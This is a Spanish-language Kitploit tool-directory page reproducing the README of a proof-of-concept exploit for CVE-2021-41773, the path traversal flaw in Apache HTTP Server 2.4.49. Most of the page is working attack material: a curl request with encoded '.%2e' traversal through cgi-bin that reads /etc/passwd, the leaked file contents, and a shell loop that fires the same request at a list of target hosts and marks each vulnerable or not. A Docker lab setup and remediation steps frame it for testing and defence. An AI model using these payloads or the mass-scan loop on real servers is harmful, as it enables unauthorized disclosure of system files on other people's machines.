Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-41773 — Exploit de prueba de concepto para la vulnerabilidad de path traversal en Apache HTTP Server 2.4.49 (CVE-2021-41773) con configuración de Docker y múltiples métodos de explotación para divulgación de archivos. | Kitploit
Herramientas/GitHubGitHub/jbovet/cve-2021-41773
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de PenetraciónAprendizaje y Educación
GitHubjbovet/cve-2021-41773

CVE-2021-41773

Exploit de prueba de concepto para la vulnerabilidad de path traversal en Apache HTTP Server 2.4.49 (CVE-2021-41773) con configuración de Docker y múltiples métodos de explotación para divulgación de archivos.

Ver Repositorio
431hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2021-41773

Vulnerabilidad de path traversal y divulgación de archivos en Apache HTTP Server 2.4.49 (CVE-2021-41773)

Información

Se encontró una falla en un cambio realizado en la normalización de rutas en Apache HTTP Server 2.4.49. Un atacante podría usar un ataque de path traversal (salto de directorio) para mapear URLs a archivos fuera del directorio raíz esperado.

Si los archivos fuera del directorio raíz no están protegidos por "require all denied", estas solicitudes pueden tener éxito. Además, esta falla podría filtrar el código fuente de archivos interpretados como scripts CGI.

Se sabe que este problema está siendo explotado activamente.

Este problema solo afecta a Apache 2.4.49 y no a versiones anteriores.

Agradecimientos: Este problema fue reportado por Ash Daulton junto con el equipo de seguridad de cPanel

Reportado al equipo de seguridad 2021-09-29 Corregido por r1893775 en 2.4.50 2021-10-01 Actualización 2.4.50 publicada 2021-10-04 Afecta 2.4.49

PoC

root@kitploit:~
$ docker build -t cve-2021-41773 .
$ docker run --rm -d -p 80:80 cve-2021-41773

Confirmar que funciona

root@kitploit:~
$ curl -I http://localhost
HTTP/1.1 200 OK
Date: Wed, 06 Oct 2021 13:25:18 GMT
Server: Apache/2.4.49 (Unix)
Last-Modified: Mon, 11 Jun 2007 18:53:14 GMT
ETag: "2d-432a5e4a73a80"
Accept-Ranges: bytes
Content-Length: 45
Content-Type: text/html

Exploit 1

root@kitploit:~
curl --data "echo;id" 'http://localhost/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd'

Salida

root@kitploit:~
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
man:x:13:15:man:/usr/man:/sbin/nologin
postmaster:x:14:12:postmaster:/var/mail:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
cyrus:x:85:12::/usr/cyrus:/sbin/nologin
vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
www-data:x:82:82:Linux User,,,:/home/www-data:/sbin/nologin
utmp:x:100:406:utmp:/home/utmp:/bin/false

Exploit 2

root@kitploit:~
cat targets | while read host do ; do curl --silent --path-as-is --insecure "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" | grep "root:*" && echo "$host \033[0;31mVulnerable\n" || echo "$host \033[0;32mNot Vulnerable\n";done

Salida

root@kitploit:~
root:x:0:0:root:/root:/bin/ash
operator:x:11:0:operator:/root:/sbin/nologin
localhost Vulnerable

Cómo solucionarlo

  1. Actualizar Apache HTTP Server 2.4.50 publicado el 2021-10-04
  2. Denegar y editar lo siguiente en el archivo de configuración de apache2:
root@kitploit:~
<!-- Vulnerable (Require all granted in '/') -->
<Directory />
  Options FollowSymLinks
  AllowOverride None
  Require all granted
</Directory>

<!-- Patched (Require all denied in '/') -->
<Directory />
  Options FollowSymLinks
  AllowOverride None
  Require all denied
</Directory>

Referencias

  • https://httpd.apache.org/security/vulnerabilities_24.html
Descargar herramienta